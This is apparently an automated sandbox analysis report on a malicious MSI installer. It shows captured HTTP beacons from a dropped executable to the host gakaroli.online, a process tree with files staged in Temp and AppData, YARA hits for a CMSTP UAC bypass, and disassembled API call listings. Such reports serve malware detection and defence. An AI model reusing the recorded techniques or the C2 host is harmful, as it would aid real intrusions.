                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ggbAnPKaQY03VRvHY8sSrlQSH2%2B3%2BqxQW7N0RSlbGhTdOt7eLaJ7gWLNnWGeHC8eCXTXqJ5yylrCw4uFiw3uOVJvVZiWfM0AC4%2BebHpl%2FDZ%2BzfsSexTP1nlHXJx%2B2oAIjx8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b467e77ef9d-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2043&min_rtt=2036&rtt_var=778&sent=59&recv=112&lost=0&retrans=0&sent_bytes=2835&recv_bytes=106096&delivery_rate=1393794&cwnd=98&unsent_bytes=0&cid=7928d7c2eb7e307f&ts=1198&x=0"


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                9 | 192.168.2.4 | 49815 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-11-30 01:25:33 UTC | 406 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 35
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:33 UTC | 35 | OUT | Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Data Ascii:
                                                                                                2024-11-30 01:25:34 UTC | 730 | IN | HTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:34 GMT
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nY55A5jt%2F9YCa0XQg28S88KaLvihTeU6N8ya4UaF99S5Gm%2F4UZx1U2I3CrK515K8onKHRHCCa%2F4CmP9beIuNF2h8cOjDHorPDSJU1cIhtgOASTLOlWiFrdKebssL7DFMWoU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b57ab6842b3-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=14583&min_rtt=13733&rtt_var=5757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1077&delivery_rate=212626&cwnd=236&unsent_bytes=0&cid=6a53900d56674536&ts=686&x=0"


                                                                                                Target ID:0
                                                                                                Start time:20:23:58
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ONHQNHFT.msi"
                                                                                                Imagebase:0x7ff7172e0000
                                                                                                File size:69'632 bytes
                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:20:23:58
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                Imagebase:0x7ff7172e0000
                                                                                                File size:69'632 bytes
                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:2
                                                                                                Start time:20:24:00
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:2'137'808 bytes
                                                                                                MD5 hash:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1802356275.0000000003836000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:20:24:11
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                Imagebase:0x400000
                                                                                                File size:2'137'808 bytes
                                                                                                MD5 hash:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:20:24:24
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:8
                                                                                                Start time:20:24:24
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:20:24:53
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Imagebase:0x140000000
                                                                                                File size:2'364'728 bytes
                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:11
                                                                                                Start time:20:25:01
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:2'137'808 bytes
                                                                                                MD5 hash:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:20:25:14
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2541651390.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:13
                                                                                                Start time:20:25:15
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:18
                                                                                                Start time:20:25:25
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:2'137'808 bytes
                                                                                                MD5 hash:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:19
                                                                                                Start time:20:25:37
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Has exited:true

                                                                                                Target ID:20
                                                                                                Start time:20:25:37
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:21
                                                                                                Start time:20:25:52
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Imagebase:0x140000000
                                                                                                File size:2'364'728 bytes
                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Has exited:false

                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105,59800000,59857008), ref: 5000C5A8
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5C8
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5E6
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                  • RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                  • RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                  • lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 5000C6D7
                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 5000C6E4
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 5000C6EA
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 5000C718
                                                                                                  • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 5000C76E
                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 5000C77E
                                                                                                  • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 5000C7AE
                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 5000C7BE
                                                                                                  • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 5000C7ED
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Openlstrcpyn$LibraryLoadLocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,59800000,59857008), ref: 5000C3AD
                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 5000C3C4
                                                                                                  • lstrcpynW.KERNEL32(?,?,?,?,59800000,59857008), ref: 5000C3F4
                                                                                                  • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C463
                                                                                                  • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C4AB
                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C4BE
                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C4D4
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C4E0
                                                                                                  • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,59800000), ref: 5000C51C
                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 5000C528
                                                                                                  • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 5000C54B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                  • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E1
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E7
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C10C
                                                                                                    • Part of subcall function 5001C048: FileTimeToLocalFileTime.KERNEL32(?), ref: 5001C078
                                                                                                    • Part of subcall function 5001C048: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001C087
                                                                                                    • Part of subcall function 5001C048: @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001C0BD
                                                                                                  • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C105
                                                                                                    • Part of subcall function 5001C140: FindClose.KERNEL32(?,?,5001C10A,00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C14C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileTime$Find$System@System@@Sysutils@Unicode$Array$qqrr20Char$qqrx20CloseClose$qqrr19DateErrorFirstFromLastLocalSearchStringStringpbi
                                                                                                  • String ID:
                                                                                                  APIs
                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 5001D4E5
                                                                                                  • @System@@_llmul$qqrv.RTL120(?,00000000,?,?,?,?,?,?), ref: 5001D507
                                                                                                  • @System@@_llmul$qqrv.RTL120(?,00000000,?,?,?,?,?,?), ref: 5001D521
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@_llmul$qqrv$DiskFreeSpace
                                                                                                  • String ID:
                                                                                                  • API String ID: 50643528-0
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                    • Part of subcall function 50009E7C: @System@@NewUnicodeString$qqri.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E87
                                                                                                    • Part of subcall function 50009E7C: @System@Move$qqrpxvpvi.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E9A
                                                                                                    • Part of subcall function 50009E7C: @System@@LStrClr$qqrpv.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009EA1
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,00000100), ref: 50025BB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$Asg$qqrr20CharClr$qqrpvFromInfoLen$qqrr20LocaleMove$qqrpxvpviStringString$qqriStringpbiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2480292918-0
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 5001BB48
                                                                                                  • FindClose.KERNEL32(00000000,?,?), ref: 5001BB53
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,?,?), ref: 5001BB6C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFileFirstMove$qqrpxvpviSystem@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1082176048-0
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?), ref: 5001BD25
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 5001BD2B
                                                                                                  • FindClose.KERNEL32(00000000,00000000,?), ref: 5001BD36
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$Char$qqrx20CloseFileFirstStringSystem@System@@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1585263303-0
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(59800000,?,0000020A), ref: 5000C30A
                                                                                                  • @System@LoadResourceModule$qqrpbo.RTL120(59800000,?,0000020A), ref: 5000C313
                                                                                                    • Part of subcall function 5000C58C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,59800000,59857008), ref: 5000C5A8
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5C8
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5E6
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                    • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                    • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                    • Part of subcall function 5000C58C: RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Open$FileModuleNameQueryValue$CloseLoadModule$qqrpboResourceSystem@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2494118284-0
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,50028D40,00000000,50028F6A,?,?,00000000,00000000), ref: 50025BD7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LocalTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 481472006-0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0ab3d6a071e3239a749166a548f6c1898b499ecd4e4622bb1771b523fb6e4014
                                                                                                  • Instruction ID: cf3d65e411f67d36cb327356722faaf4ffd90df9c04122c1e780dd8bf9108d71
                                                                                                  • Opcode Fuzzy Hash: 0ab3d6a071e3239a749166a548f6c1898b499ecd4e4622bb1771b523fb6e4014
                                                                                                  • Instruction Fuzzy Hash: DAF1947150C3C29ED30F9F78D9BA462BF78AF0761130A55DBD8869F0A3D2A02452DB26
                                                                                                  Memory Dump Source
